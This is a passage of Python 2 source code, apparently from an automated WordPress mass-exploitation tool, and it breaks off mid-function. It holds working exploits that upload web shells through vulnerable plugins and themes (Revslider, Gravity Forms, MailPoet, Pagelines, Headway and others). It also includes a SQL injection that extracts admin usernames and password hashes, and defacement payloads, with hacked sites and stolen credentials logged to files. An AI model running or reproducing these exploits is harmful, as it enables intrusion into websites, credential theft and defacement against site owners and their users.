  1358. with open('result/Index_results.txt', 'a') as writer:
  1359. writer.write(site + '/vuln.htm' + '\n')
  1360. else:
  1361. self.Print_NotVuln('cherry plugin', site)
  1362. else:
  1363. self.Print_NotVuln('cherry plugin', site)
  1364. except:
  1365. self.Print_NotVuln('cherry plugin', site)
  1366.  
  1367. def addblockblocker(self, site):
  1368. try:
  1369. ShellFile = {'popimg': open(self.pagelinesExploitShell, 'rb')}
  1370. Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
  1371. requests.post(Exp, files=ShellFile, timeout=5)
  1372. CheckShell = 'http://' + site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/' \
  1373. + self.pagelinesExploitShell.split('/')[1]
  1374. GoT = requests.get(CheckShell, timeout=5)
  1375. if GoT.status_code == 200:
  1376. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1377. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1378. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1379. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1380. with open('result/Shell_results.txt', 'a') as writer:
  1381. writer.write(site + '/wp-content/vuln.php' + '\n')
  1382. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1383. self.Print_Vuln_index(site + '/vuln.htm')
  1384. with open('result/Index_results.txt', 'a') as writer:
  1385. writer.write(site + '/vuln.htm' + '\n')
  1386. else:
  1387. self.Print_NotVuln('Adblock Blocker', site)
  1388. else:
  1389. self.Print_NotVuln('Adblock Blocker', site)
  1390. except:
  1391. self.Print_NotVuln('Adblock Blocker', site)
  1392.  
  1393. def HeadWayThemeExploit(self, site):
  1394. try:
  1395. CheckTheme = requests.get('http://' + site, timeout=5)
  1396. if '/wp-content/themes/headway' in CheckTheme.text.encode('utf-8'):
  1397. ThemePath = re.findall('/wp-content/themes/(.*)/style.css', CheckTheme.text.encode('utf-8'))
  1398. ShellFile = {'Filedata': open(self.pagelinesExploitShell, 'rb')}
  1399. useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1400.  
  1401. url = "http://" + site + "/wp-content/themes/" + ThemePath[0] +\
  1402. "/library/visual-editor/lib/upload-header.php"
  1403. Check = requests.get(url, timeout=5)
  1404. if Check.status_code == 200:
  1405. GoT = requests.post(url, files=ShellFile, headers=useragent)
  1406. if GoT.status_code == 200:
  1407. Shell_URL = 'http://' + site + '/wp-content/uploads/headway/header-uploads/' +\
  1408. self.pagelinesExploitShell.split('/')[1]
  1409. requests.get(Shell_URL, timeout=5)
  1410. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1411. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1412. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1413. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1414. with open('result/Shell_results.txt', 'a') as writer:
  1415. writer.write(site + '/wp-content/vuln.php' + '\n')
  1416. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1417. self.Print_Vuln_index(site + '/vuln.htm')
  1418. with open('result/Index_results.txt', 'a') as writer:
  1419. writer.write(site + '/vuln.htm' + '\n')
  1420. else:
  1421. self.Print_NotVuln('Headway Theme', site)
  1422. else:
  1423. self.Print_NotVuln('Headway Theme', site)
  1424. else:
  1425. self.Print_NotVuln('Headway Theme', site)
  1426. else:
  1427. self.Print_NotVuln('Headway Theme', site)
  1428. except:
  1429. self.Print_NotVuln('Headway Theme', site)
  1430.  
  1431.  
  1432. def pagelinesExploit(self, site):
  1433. try:
  1434. FileShell = {'file': open(self.pagelinesExploitShell, 'rb')}
  1435. PostData = {'settings_upload': "settings", 'page': "pagelines"}
  1436. Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1437. url = "http://" + site + "/wp-admin/admin-post.php"
  1438. GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5)
  1439. if GoT.status_code == 200:
  1440. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1441. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1442. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1443. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1444. with open('result/Shell_results.txt', 'a') as writer:
  1445. writer.write(site + '/wp-content/vuln.php' + '\n')
  1446. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1447. self.Print_Vuln_index(site + '/vuln.htm')
  1448. with open('result/Index_results.txt', 'a') as writer:
  1449. writer.write(site + '/vuln.htm' + '\n')
  1450. else:
  1451. self.Print_NotVuln('Pagelines', site)
  1452. else:
  1453. self.Print_NotVuln('Pagelines', site)
  1454. except:
  1455. self.Print_NotVuln('Pagelines', site)
  1456.  
  1457.  
  1458. def wysijaExploit(self, site):
  1459. try:
  1460. FileShell = {'my-theme': open(self.MailPoetZipShell, 'rb')}
  1461. PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
  1462. 'page': 'GZNeFLoZAb'}
  1463. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1464. url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
  1465. GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
  1466. if 'page=wysija_campaigns&amp;action=themes&amp;reload=1' in GoT.text.encode('utf-8'):
  1467. sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
  1468. index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
  1469. CheckShell = requests.get(sh, timeout=5)
  1470. CheckIndex = requests.get(index, timeout=5)
  1471. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1472. self.Print_vuln_Shell(site + '/wp-content/uploads/wysija/themes/rock/vuln.php')
  1473. with open('result/Shell_results.txt', 'a') as writer:
  1474. writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
  1475. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1476. self.Print_Vuln_index(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif')
  1477. with open('result/Index_results.txt', 'a') as writer:
  1478. writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
  1479. else:
  1480. self.Print_NotVuln('wysija', site)
  1481. else:
  1482. self.Print_NotVuln('wysija', site)
  1483. except:
  1484. self.Print_NotVuln('wysija', site)
  1485.  
  1486.  
  1487.  
  1488. def HD_WebPlayerSqli(self, site):
  1489. try:
  1490. check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
  1491. if '<?xml version="' in check.text.encode('utf-8'):
  1492. Exploit = '/wp-content/plugins/hd-webplayer/playlist.php' \
  1493. '?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass)' \
  1494. ',4,5,6,7,8,9,10,11+from+wp_users--'
  1495. GoT = requests.get('http://' + site + Exploit, timeout=5)
  1496. User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
  1497. username = User_Pass[1].split(':')[0]
  1498. password = User_Pass[1].split(':')[1]
  1499. self.Print_Vuln('HD-Webplayer', site)
  1500. self.Print_Username_Password(username, password)
  1501. with open('result/Sqli_result.txt', 'a') as writer:
  1502. writer.write('------------------------------' + '\n' + 'Domain: ' + site + '\n' +
  1503. 'Username : ' + username + '\n' + 'Password : ' + password + '\n')
  1504. else:
  1505. self.Print_NotVuln('HD-Webplayer', site)
  1506. except:
  1507. self.Print_NotVuln('HD-Webplayer', site)
  1508.  
  1509.  
  1510. def Gravity_Forms_Shell(self, site):
  1511. try:
  1512. Grav_checker = requests.get('http://' + site + '/?gf_page=upload', timeout=5)
  1513. if '"status" : "error"' in Grav_checker.text.encode('utf-8'):
  1514. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1515. fileDeface = {'file': open(self.gravShell, 'rb')}
  1516. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'css.php5'}
  1517. try:
  1518. url = "http://" + site + '/?gf_page=upload'
  1519. GoT = requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
  1520. if '.php5' in GoT.text.encode('utf-8'):
  1521. CheckShell = requests.get('http://' + site + '/wp-content/_input_3_css.php5', timeout=5)
  1522. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1523. Checkshell2 = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1524. if 'Vuln!!' in Checkshell2.text.encode('utf-8'):
  1525. Checkshell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1526. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1527. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  1528. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1529. with open('result/Shell_results.txt', 'a') as writer:
  1530. writer.write(site + '/wp-content/vuln.php' + '\n')
  1531. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1532. self.Print_Vuln_index(site + '/vuln.htm')
  1533. with open('result/Index_results.txt', 'a') as writer:
  1534. writer.write(site + '/vuln.htm' + '\n')
  1535. else:
  1536. self.Gravity_forms_Index(site)
  1537. else:
  1538. self.Gravity_forms_Index(site)
  1539. else:
  1540. self.Gravity_forms_Index(site)
  1541. else:
  1542. self.Gravity_forms_Index(site)
  1543. except Exception, e:
  1544. self.Print_NotVuln('Gravity-Forms', site)
  1545. else:
  1546. self.Print_NotVuln('Gravity Forms', site)
  1547. except:
  1548. self.Timeout(site)
  1549.  
  1550.  
  1551. def Gravity_forms_Index(self, site):
  1552. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1553. fileDeface = {'file': open(self.Jce_Deface_image, 'rb')}
  1554. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'pwn.gif'}
  1555. post_data2 = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'pwn.gif'}
  1556. try:
  1557. url = "http://" + site + '/?gf_page=upload'
  1558. requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
  1559. requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5)
  1560. CheckIndex = requests.get('http://' + site + '/_input_3_pwn.gif', timeout=5)
  1561. CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_pwn.gif', timeout=5)
  1562. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1563. self.Print_Vuln_index(site + '/_input_3_pwn.gif')
  1564. with open('result/Index_results.txt', 'a') as writer:
  1565. writer.write(site + '/_input_3_pwn.gif' + '\n')
  1566. elif 'GIF89a' in CheckIndex2.text.encode('utf-8'):
  1567. self.Print_Vuln_index(site + '/wp-content/_input_3_pwn.gif')
  1568. with open('result/Index_results.txt', 'a') as writer:
  1569. writer.write(site + '/wp-content/_input_3_pwn.gif' + '\n')
  1570. else:
  1571. self.Print_NotVuln('Gravity-Forms', site)
  1572. except Exception, e:
  1573. self.Print_NotVuln('Gravity-Forms', site)
  1574.  
  1575. def WP_User_Frontend(self, site):
  1576. try:
  1577. CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload', timeout=5)
  1578. if 'error' in CheckVuln.text or CheckVuln.status_code == 200:
  1579. post = {}
  1580. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1581. post['action'] = 'wpuf_file_upload'
  1582. files = {'wpuf_file': open(self.Jce_Deface_image, 'rb')}
  1583. try:
  1584. _url = 'http://' + site + "/wp-admin/admin-ajax.php"
  1585. _open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10)
  1586. if 'image][]' in _open.text.encode('utf-8'):
  1587. _Def = site + "/wp-content/uploads/20" + self.year + "/" + self.month + "/" + self.Jce_Deface_image.split('/')[1]
  1588. Check_Deface = requests.get('http://' + _Def, timeout=5)
  1589. if 'GIF89a' in Check_Deface.text.encode('utf-8'):
  1590. self.Print_Vuln_index(_Def)
  1591. with open('result/Index_results.txt', 'a') as writer:
  1592. writer.write(_Def + '\n')
  1593. else:
  1594. self.Print_NotVuln('WP-User-Frontend', site)
  1595. else:
  1596. self.Print_NotVuln('WP-User-Frontend', site)
  1597. except:
  1598. self.Print_NotVuln('WP-User-Frontend', site)
  1599. else:
  1600. self.Print_NotVuln('WP-User-Frontend', site)
  1601. except:
  1602. self.Print_NotVuln('WP-User-Frontend', site)
  1603.  
  1604.  
  1605. def Revslider_css(self, site):
  1606. IndeXText = 'Vuln!! Patch it Now!'
  1607. ency = {'action': "revslider_ajax_action",
  1608. 'client_action': "update_captions_css",
  1609. 'data': "<body style='color: transparent;background-color: black'><center><h1>"
  1610. "<b style='color: white'>" + IndeXText + "<p style='color: transparent'>",
  1611.  
  1612. }
  1613. try:
  1614. url = "http://" + site + "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
  1615. aa = requests.post(url, data=ency, timeout=5)
  1616. if 'succesfully' in aa.text.encode('utf-8'):
  1617. deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
  1618. self.Print_Vuln_index(deface)
  1619. with open('result/Index_results.txt', 'a') as writer:
  1620. writer.write(deface + '\n')
  1621. else:
  1622. self.Print_NotVuln('Revslider', site)
  1623. except:
  1624. self.Print_NotVuln('Revslider', site)
  1625.  
  1626. def Revslider_SHELL(self, site):
  1627. try:
  1628. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1629. Exploit = 'http://' + site + '/wp-admin/admin-ajax.php'
  1630. data = {'action': "revslider_ajax_action", 'client_action': "update_plugin"}
  1631. FileShell = {'update_file': open(self.MailPoetZipShell, 'rb')}
  1632. CheckRevslider = requests.get('http://' + site, timeout=5)
  1633. if '/wp-content/plugins/revslider/' in CheckRevslider.text.encode('utf-8'):
  1634. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1635. CheckRev = requests.get('http://' + site +
  1636. '/wp-content/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1637. if 'GIF89a' in CheckRev.text.encode('utf-8'):
  1638. ShellCheck = requests.get('http://' + site +
  1639. '/wp-content/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1640. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1641. self.Print_vuln_Shell(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php')
  1642. with open('result/Shell_results.txt', 'a') as writer:
  1643. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1644. self.Print_Vuln_index(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif')
  1645. with open('result/Index_results.txt', 'a') as writer:
  1646. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1647. self.Revslider_Config(site)
  1648. else:
  1649. self.Revslider_Config(site)
  1650. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
  1651. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1652. CheckRev1 = requests.get('http://' + site +
  1653. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1654. if 'GIF89a' in CheckRev1.text.encode('utf-8'):
  1655. ShellCheck = requests.get('http://' + site +
  1656. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1657. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1658. self.Print_vuln_Shell(
  1659. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php')
  1660. with open('result/Shell_results.txt', 'a') as writer:
  1661. writer.write(
  1662. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1663. self.Print_Vuln_index(
  1664. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1665. with open('result/Index_results.txt', 'a') as writer:
  1666. writer.write(
  1667. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1668. self.Revslider_Config(site)
  1669. else:
  1670. self.Revslider_Config(site)
  1671. elif '/wp-content/themes/striking_r/' in CheckRevslider.text.encode('utf-8'):
  1672. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1673. CheckRev2 = requests.get('http://' + site +
  1674. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1675. if 'GIF89a' in CheckRev2.text.encode('utf-8'):
  1676. ShellCheck = requests.get('http://' + site +
  1677. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1678. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1679. self.Print_vuln_Shell(
  1680. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php')
  1681. with open('result/Shell_results.txt', 'a') as writer:
  1682. writer.write(
  1683. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1684. self.Print_Vuln_index(
  1685. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1686. with open('result/Index_results.txt', 'a') as writer:
  1687. writer.write(
  1688. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1689. self.Revslider_Config(site)
  1690. else:
  1691. self.Revslider_Config(site)
  1692. elif '/wp-content/themes/IncredibleWP/' in CheckRevslider.text.encode('utf-8'):
  1693. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1694. CheckRev3 = requests.get('http://' + site +
  1695. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1696. if 'GIF89a' in CheckRev3.text.encode('utf-8'):
  1697. ShellCheck = requests.get('http://' + site +
  1698. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1699. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1700. self.Print_vuln_Shell(
  1701. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php')
  1702. with open('result/Shell_results.txt', 'a') as writer:
  1703. writer.write(
  1704. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1705. self.Print_Vuln_index(
  1706. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1707. with open('result/Index_results.txt', 'a') as writer:
  1708. writer.write(
  1709. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1710. self.Revslider_Config(site)
  1711. else:
  1712. self.Revslider_Config(site)
  1713. elif '/wp-content/themes/ultimatum/' in CheckRevslider.text.encode('utf-8'):
  1714. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1715. CheckRev4 = requests.get('http://' + site +
  1716. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1717. if 'GIF89a' in CheckRev4.text.encode('utf-8'):
  1718. ShellCheck = requests.get('http://' + site +
  1719. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1720. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1721. self.Print_vuln_Shell(
  1722. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php')
  1723. with open('result/Shell_results.txt', 'a') as writer:
  1724. writer.write(
  1725. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1726. self.Print_Vuln_index(
  1727. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif')
  1728. with open('result/Index_results.txt', 'a') as writer:
  1729. writer.write(
  1730. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1731. self.Revslider_Config(site)
  1732. else:
  1733. self.Revslider_Config(site)
  1734. elif '/wp-content/themes/medicate/' in CheckRevslider.text.encode('utf-8'):
  1735. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1736. CheckRev5 = requests.get('http://' + site +
  1737. '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif', timeout=5)
  1738. if 'GIF89a' in CheckRev5.text.encode('utf-8'):
  1739. ShellCheck = requests.get('http://' + site +
  1740. '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php', timeout=5)
  1741. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1742. self.Print_vuln_Shell(
  1743. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php')
  1744. with open('result/Shell_results.txt', 'a') as writer:
  1745. writer.write(
  1746. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php' + '\n')
  1747. self.Print_Vuln_index(
  1748. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif')
  1749. with open('result/Index_results.txt', 'a') as writer:
  1750. writer.write(
  1751. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif' + '\n')
  1752. self.Revslider_Config(site)
  1753. else:
  1754. self.Revslider_Config(site)
  1755. elif '/wp-content/themes/centum/' in CheckRevslider.text.encode('utf-8'):
  1756. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1757. CheckRev6 = requests.get('http://' + site +
  1758. '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif', timeout=5)
  1759. if 'GIF89a' in CheckRev6.text.encode('utf-8'):
  1760. ShellCheck = requests.get('http://' + site +
  1761. '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php', timeout=5)
  1762. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1763. self.Print_vuln_Shell(
  1764. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php')
  1765. with open('result/Shell_results.txt', 'a') as writer:
  1766. writer.write(
  1767. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php' + '\n')
  1768. self.Print_Vuln_index(site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif')
  1769. with open('result/Index_results.txt', 'a') as writer:
  1770. writer.write(
  1771. site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif' + '\n')
  1772. self.Revslider_Config(site)
  1773. else:
  1774. self.Revslider_Config(site)
  1775. elif '/wp-content/themes/beach_apollo/' in CheckRevslider.text.encode('utf-8'):
  1776. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1777. CheckRev7 = requests.get('http://' + site +
  1778. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1779. if 'GIF89a' in CheckRev7.text.encode('utf-8'):
  1780. ShellCheck = requests.get('http://' + site +
  1781. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1782. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1783. self.Print_vuln_Shell(
  1784. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php')
  1785. with open('result/Shell_results.txt', 'a') as writer:
  1786. writer.write(
  1787. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1788. self.Print_Vuln_index(
  1789. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif')
  1790. with open('result/Index_results.txt', 'a') as writer:
  1791. writer.write(
  1792. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1793. self.Revslider_Config(site)
  1794. else:
  1795. self.Revslider_Config(site)
  1796. elif '/wp-content/themes/cuckootap/' in CheckRevslider.text.encode('utf-8'):
  1797. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1798. CheckRev8 = requests.get('http://' + site +
  1799. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1800. if 'GIF89a' in CheckRev8.text.encode('utf-8'):
  1801. ShellCheck = requests.get('http://' + site +
  1802. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1803. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1804. self.Print_vuln_Shell(
  1805. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php')
  1806. with open('result/Shell_results.txt', 'a') as writer:
  1807. writer.write(
  1808. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1809. self.Print_Vuln_index(
  1810. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1811. with open('result/Index_results.txt', 'a') as writer:
  1812. writer.write(
  1813. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1814. self.Revslider_Config(site)
  1815. else:
  1816. self.Revslider_Config(site)
  1817. elif '/wp-content/themes/pindol/' in CheckRevslider.text.encode('utf-8'):
  1818. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1819. CheckRev9 = requests.get('http://' + site +
  1820. '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif', timeout=5)
  1821. if 'GIF89a' in CheckRev9.text.encode('utf-8'):
  1822. ShellCheck = requests.get('http://' + site +
  1823. '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php', timeout=5)
  1824. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1825. self.Print_vuln_Shell(
  1826. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php')
  1827. with open('result/Shell_results.txt', 'a') as writer:
  1828. writer.write(
  1829. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php' + '\n')
  1830. self.Print_Vuln_index(site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif')
  1831. with open('result/Index_results.txt', 'a') as writer:
  1832. writer.write(
  1833. site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif' + '\n')
  1834. self.Revslider_Config(site)
  1835. else:
  1836. self.Revslider_Config(site)
  1837. elif '/wp-content/themes/designplus/' in CheckRevslider.text.encode('utf-8'):
  1838. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1839. CheckRev10 = requests.get('http://' + site +
  1840. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1841. if 'GIF89a' in CheckRev10.text.encode('utf-8'):
  1842. ShellCheck = requests.get('http://' + site +
  1843. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1844. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1845. self.Print_vuln_Shell(
  1846. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php')
  1847. with open('result/Shell_results.txt', 'a') as writer:
  1848. writer.write(
  1849. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1850. self.Print_Vuln_index(
  1851. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1852. with open('result/Index_results.txt', 'a') as writer:
  1853. writer.write(
  1854. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1855. self.Revslider_Config(site)
  1856. else:
  1857. self.Revslider_Config(site)
  1858. elif '/wp-content/themes/rarebird/' in CheckRevslider.text.encode('utf-8'):
  1859. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1860. CheckRev11 = requests.get('http://' + site +
  1861. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1862. if 'GIF89a' in CheckRev11.text.encode('utf-8'):
  1863. ShellCheck = requests.get('http://' + site +
  1864. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1865. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1866. self.Print_vuln_Shell(
  1867. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php')
  1868. with open('result/Shell_results.txt', 'a') as writer:
  1869. writer.write(
  1870. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1871. self.Print_Vuln_index(
  1872. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1873. with open('result/Index_results.txt', 'a') as writer:
  1874. writer.write(
  1875. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1876. self.Revslider_Config(site)
  1877.  
  1878. else:
  1879. self.Revslider_Config(site)
  1880. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
  1881. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1882. CheckRev12 = requests.get('http://' + site +
